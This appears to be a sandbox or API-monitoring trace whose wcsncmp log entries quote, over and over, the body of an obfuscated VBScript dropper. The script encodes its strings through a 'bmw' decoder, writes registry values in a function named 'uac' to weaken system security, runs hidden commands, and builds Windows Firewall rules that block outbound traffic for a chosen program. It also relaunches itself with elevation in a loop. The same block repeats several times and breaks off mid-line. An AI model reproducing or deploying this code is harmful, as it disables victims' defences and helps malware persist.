bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.329] wcsncmp (_String1="R_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.329] wcsncmp (_String1="_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.329] wcsncmp (_String1="OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.330] wcsncmp (_String1="UT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 